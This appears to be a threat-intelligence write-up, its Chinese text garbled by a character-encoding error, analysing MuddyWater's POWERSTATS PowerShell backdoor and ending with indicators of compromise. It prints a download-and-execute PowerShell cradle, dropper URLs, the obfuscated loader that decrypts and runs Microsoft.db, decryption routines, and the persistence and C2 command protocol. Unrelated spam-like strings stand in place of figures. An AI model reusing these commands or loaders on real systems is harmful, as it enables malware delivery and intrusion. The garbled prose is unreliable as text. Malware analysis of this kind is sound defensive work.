APT×éÖ¯¡°MuddyWater£¨ÎÛË®£©¡±×îж¯Ïò·ÖÎö

°ä²¼¹¦·ò 2018-12-01
¡°MuddyWater£¨ÎÛË®£©¡±ÊÇÒ»¸öÀ´×ÔÓÚÒÁÀʵÄÖØÒªÕë¶ÔÖж«µØÓò¹¥»÷µÄAPT×éÖ¯¡£¡£¡£¸Ã×éÖ¯ÖØÒªÀûÓÃPowershellÖ´ÐÐËùÓжñÒâ²Ù×÷£¬£¬£¬²¢ÔÚһϵÁÐÐж¯ÖÐÑÜÉú³öÁËËûÃǵÄרÓÐľÂí¡°POWERSTATS¡±¡£¡£¡£¸Ã×éÖ¯µÄ¹¥»÷Ö¸±êÖØÒª¼¯ÖÐÓÚµ±¾Ö£¬£¬£¬Í¨Ñ¶ÓëʯÓÍÕâЩÁìÓò¡£¡£¡£


ÔÚ¶ÔÈÕ³£Ñù±¾µÄ¸ú×ÙÖУ¬£¬£¬ÎÒÃÇ·¢ÏÖÁËһЩеġ°MuddyWater¡±µÄÌØÖÖľÂí¡°POWERSTATS¡±£¬£¬£¬²¢¸ù»ùÈ·¶¨ÕâЩÑù±¾ÎªMuddyWater×éÖ¯×îй¥»÷»î¶¯µÄ²úÆ·¡£¡£¡£


ÔØºÉ·ÖÎö


×îй¥»÷ÈÔͨ¹ýÓʼþõ辶ѡȡ¶ñÒâÎĵµµÄ·½Ê½²¢¹²Í¬Éç»á¹¤³Ìѧ½øÐÐͶ·Å¡£¡£¡£
 
OG¶«·½Ìü¡¤(Öйú´ó½)

OG¶«·½Ìü¡¤(Öйú´ó½)

ÓйØÎĵµ¾ùǶÈëÁËÄ£ºýͼƬÒÔÒýÓÕÊܺ¦Õßµã»÷ÆôÓöñÒâºê´úÂ룬£¬£¬ÎĵµÖÐÔ̺¬µÄ¶ñÒâºê´úÂë¸ù»ùÀàËÆ£¬£¬£¬¶¼Ê¹ÓÃͳһÖÖËã·¨½øÐÐÊý¾Ý½âÃÜ¡£¡£¡£Pyhton½âÃÜ´úÂëÈçÏ£º
¡°¡±.join([chr(int(data[_:_+3]) - KEY) for _ in range(0,len(data),3)])


Êý¾Ý½âÃÜÖ®ºóÖØÒªÖ´ÐÐÈçÏÂpowershell´úÂ룺
powershell -exec bypass -c ""IEX((New-Object Net.WebClient).DownloadString(\'URL'))


ÓйØÎĵµµÄÏÂÔØµÄÁ´½Ó±ðÀëÈçÏ£º
http://pazazta.com/app/icon[.]png
http://3cbc.net/dropbox/icon[.]icon
http://ohe.ie/cli/icon[.]png
http://ohe.ie/cp/icon[.]png


ÏÂÔØµÄÎļþ¾ùΪpowershell´úÂ룬£¬£¬Í¨¹ýʹÓÃpowershellÖ´ÐÐÕâЩÏÂÔØµÄ¹¥»÷ÔØºÉÀ´Ö´ÐÐÈç϶ñÒâ²Ù×÷£º


£¨1£©½«js±äÁ¿ÖеĴúÂëʹÓÃBase64±àÂë½âÂ룬£¬£¬²¢Ð´Èëµ½C:\Windows\Temp\temp.jpgÎļþÖС£¡£¡£


£¨2£©½«vbs±äÁ¿ÖдúÂëʹÓÃBase64±àÂë½âÂë²¢Óöþ½øÖÆ´ó¾ÖдÈëµ½C:\Windows\temp\Windows.vbeÎļþÖУ¬£¬£¬»òÕß½«vbs±äÁ¿ÖеÄÊý¾ÝÖ±½ÓÒÔ¶þ½øÖÆ´ó¾ÖдÈëµ½C:\Windows\temp\Windows.vbeÎļþÖС£¡£¡£


£¨3£©½«code±äÁ¿µÄÊý¾ÝÖ±½ÓдÈëµ½C:\ProgramData\Microsoft.dbÎļþÖС£¡£¡£


£¨4£©Æô¶¯C:\Windows\temp\Windows.vbe¡£¡£¡£


ÔÚ¿ªÊ͵ÄÎļþÖУ¬£¬£¬Windows.vbe»áŲÓÃcscript.exeÀ´Ö´ÐÐC:\\Windows\\Temp\\temp.jpgÖеÄJavascript´úÂ룬£¬£¬¸Ã´úÂë¾­¹ý»ìºÏ£¬£¬£¬½â¿ª»ìºÏÖ®ºóÎÒÃÇ·¢ÏָôúÂëÖØÒªÖ´ÐÐÈçϵÄpowershell´úÂ룺
powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\Microsoft.db);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));


¸Ã¶ÎPowershell´úÂëÓÃÓÚ½âÃÜMicrosoft.dbÖеÄÎļþ£¬£¬£¬²¢Ö´ÐнâÃܺóµÄ´úÂ룬£¬£¬½âÃܺóµÄpowershell»áÔٴνâÃÜÒ»¶ÎÊý¾Ý£¬£¬£¬¸ÃÊý¾ÝÏÈʹÓÃBase64½âÂ룬£¬£¬¶øºóÔÙ¶ÔÊý¾ÝʹÓýâѹËã·¨½øÐнâѹ£¬£¬£¬µÃµ½Ò»¶Î¾­¹ý´óÁ¿»ìºÏµÄpowershell´úÂ룬£¬£¬»ìºÏ²½Öè¸ù»ùÒÀ¸½×Ö·û»»´úÌæ£¬£¬£¬µ¹ÐòµÈ·½Ê½£¬£¬£¬½â¿ª»ìºÏºóΪ¸Ã×é֯רÓÐÌØÖÖľÂí¡°POWERSTATS¡±¡£¡£¡£


POWERSTATSľÂí·ÖÎö


POWERSTATSľÂíÊ×ÏÈ»áÉèÖÃһϵÁÐ×¢²á±íÏîÄ¿£¬£¬£¬À´½ûÓÃOfficeºêÖÒ¸æºÍ±£»£»£»¤ÊÓͼ¡£¡£¡£ÕâÊÇΪÁËÈ·±£½«À´µÄ¹¥»÷²»±ØÒªÓû§½»»¥¡£¡£¡£ÉõÖÁ»¹ÔÊÐíºê´úÂë½Ó¼ûÄÚ²¿VBA¶ÔÏ󣬣¬£¬ÒÔ±ãÔÚ½«À´µÄ¹¥»÷ÖÐÖ´ÐиüÒñ±ÎµÄºê´úÂ룬£¬£¬Í¬Ê±½«
¡°C:\windows\system32\wscript.exeC:\Windows\temp\Windows.vbe¡±Ð´Èëµ½¿ª»ú×ÔÆôÏîMicrosoft EdgeÖУ¬£¬£¬¶øºóÉèÖÃÁËÒ»¸öÃûΪMicrosoft EdgeµÄ°´Ê±¹¤×÷À´°´Ê±Å²ÓÃwscript.exeÖ´ÐÐWindows.vbe£¬£¬£¬ÒԱ㱣ÕϸöñÒⷨʽÔÚϵͳÖеÄפÁôÓ밴ʱÔËÐС£¡£¡£


Ö®ºóPOWERSTATS½«Ö´ÐнÓÏÂÀ´µÄһϵÁжñÒâÐÐΪ£¬£¬£¬Ê×ÏÈPOWERSTATSľÂí»á´Ó×Ô¼ºÉèÖõÄÈý¸ö¼ÓÃܵÄÊý¾ÝÖÐËæ»ú³éѡһ¸ö½øÐнâÃÜ£¬£¬£¬½âÃܳöÀ´Îª±ØÒª½øÐн»»¥µÄC&C·þÎñÆ÷µØÖ·£¬£¬£¬½âÃÜËã·¨ÈçÏÂ(Python)£º
"".join([chr(ord(a[_%len(KEY)])^ord(DecryptByBase64(Data)[_])) for _ in xrange(len(DecryptByBase64(Data)))])


½âÃܺóµÄC&CÈçÏÂ

OG¶«·½Ìü¡¤(Öйú´ó½)


   ½Ó×Å£¬£¬£¬»á»ñȡһϵÁÐÓû§Êý¾Ý£¬£¬£¬Ê¹Óá±**¡±Æ´½Óµ½Ò»Â·Ê¹ÓÃUTF-8±àÂ룬£¬£¬¶øºóÔÙÍÆËã³öMD5Öµ£¬£¬£¬×÷ΪÕâ´ÎµÄ»ñÈ¡µ½µÄÊý¾ÝµÄΨһ±êʶ£¬£¬£¬×îÖÕ»ú¹ØÈçÏÂURL£º
[C&C]?t=[7d4580a3910c54d62b46f24c397c8d59]&f=s&type=info&id=global_key
¶øºó½«Ö®Ç°»ñÈ¡µ½µÄÓû§Êý¾Ý½øÐÐÉÏ´«£¬£¬£¬ÉÏ´«µÄÊý¾Ý¾­¹ý¼ÓÃÜ£¬£¬£¬¼ÓÃÜËã·¨µÄÈçÏ£º
 

¸ÃËã·¨¶Ôÿ¸ö×Ö·û½øÐмÓÃÜ£¬£¬£¬ÕâÖÖ·½Ê½µÄ¼ÓÃÜ×Ö·û¸ù»ù²»´æÔÚ¿ÉÄæµÄÇé¿ö£¬£¬£¬µ«Êǵ¥¸ö×Ö·û´®Ê¹ÓÃËã·¨µÃµ½µÄ¼ÓÃÜ×Ö·ûÆäʵÊÇÒ»ÑùµÄ£¬£¬£¬ÎÒÒÔΪ·þÎñÆ÷´æÔÚÒ»ÕÅ×Ö½Ú´úÌæ±íÀ´´úÌæÃ¿¸ö¼ÓÃܺóµÄÊý¾Ý£¬£¬£¬ÔÚµÚÒ»´Î½«Êý¾ÝÉÏ´«Ö®ºó£¬£¬£¬ÈôÊÇ·þÎñÆ÷·µ»Ø¡°OK¡±°µÊ¾ÕýÈ·½Ó¹ÜÊý¾Ý£¬£¬£¬¶øºóÔÙÌìÉú20¸öËæ»ú×Ö·û£¬£¬£¬¾­¹ýMD5¼ÓÃÜÖ®ºó£¬£¬£¬ÒÔÈçϵÄURLÌåʽ·¢ËÍPOSTÒªÇ󣬣¬£¬·¢Ë͵ÄÊý¾ÝÎªËæ»úÌìÉúµÄ20¸ö×Ö·û£¬£¬£¬À´Åú×¢Äܹ»½øÐÐÏÂÒ»²½²Ù×÷¡£¡£¡£


[C&C]?t=[7d4580a3910c54d62b46f24c397c8d59]&f=s&type=live&id=global_key
ÈôÊÇ·þÎñÆ÷·µ»ØOKÔò°µÊ¾Äܹ»½øÐнÓÏÂÀ´µÄ²Ù×÷£¬£¬£¬¶øºó¶ñÒⷨʽ»áÏò·þÎñÆ÷½øÐÐÈçϵÄGETÒªÇó


[C&C]?t=[7d4580a3910c54d62b46f24c397c8d59]&f=g&type=cmd&id=global_key¡£¡£¡£


ÈôÊÇ·þÎñÆ÷ÕýÈ·ÏìÓ¦£¬£¬£¬Æä·µ»ØµÄÊý¾ÝÌåʽÈçÏ£º[ID]"~~!!~~"[Operand][Data]


ÆäÖÐ·ÖÆçµÄ²Ù×÷Âë»áÓÐ·ÖÆçµÄÖ°ÄÜ£¬£¬£¬¶ÔÓ¦ÈçÏ£º

OG¶«·½Ìü¡¤(Öйú´ó½)


Ö´ÐÐÍê¶ÔÓ¦µÄÖ°ÄÜÖ®ºó£¬£¬£¬½«·µ»ØÖµ½øÐÐBase64½øÐбàÂë¶øºóÒÔÈçϵÄÌåʽ½«Êý¾ÝÉÏ´«
[ID]:[Result]


Óë֮ǰ¹¥»÷µÄ¹ØÁª


ÔÚÓë½ñÄê10ÔÂÅû¶µÄMuddyWaterµÄ¹¥»÷Ñù±¾¶Ô±ÈºóÎÒÃÇ·¢ÏÖ£¬£¬£¬×îºóÖ´ÐÐÕæÕý¶ñÒâÐÐΪµÄPosershell´úÂëÓë±¾´ÎµÄ´úÂë¸ù»ùÒ»Ö£¬£¬£¬Ô̺¬Æä½âÃÜURLµÄËã·¨Óëkey£¬£¬£¬JavascriptÖнâÃÜPowershell´úÂëµÄËã·¨£¬£¬£¬ÓëC&C½»»¥µÄÖ¸ÁîÖ°ÄܵÈ¡£¡£¡£ÎÒÃÇÐγÉÈç϶ÔÕÕ±í¡£¡£¡£
 
OG¶«·½Ìü¡¤(Öйú´ó½)



Äܹ»·¢ÏÖ¸Ã×éÖ¯ÔÚ±¾´Î¹¥»÷ÖÐÖØÒª¸ÄÉÆÁËһЩ×îÖÕpowershell´úÂëµÄŲÓùý³Ì£¬£¬£¬Èøü¶àµÄ¹¥»÷ÔØºÉǨáãµ½C&C·þÎñÆ÷ÖУ¬£¬£¬ÕâÑùʹºóÐøµÄ²Ù×÷±äµÃÔ½·¢½Ã½ÝºÍÓÆ¾Ã¡£¡£¡£


ÓйØIOC£º
5935522717aee842433a5de9d228a715
ca9230a54f40a6a0fe52d7379459189c
0cf25597343240f88358c694d7ae7e0a
a256abb5da891f109acf8a496d9792c4
hxxp://pazazta.com/app/icon[.]png
hxxp://3cbc.net/dropbox/icon[.]icon
hxxp://ohe.ie/cli/icon[.]png
hxxp://ohe.ie/cp/icon[.]png
C:\\ProgramData\\Microsoft.db
C:\\ProgramData\\Microsoft.vbe
C:\\Windows\\Temp\\temp.jpg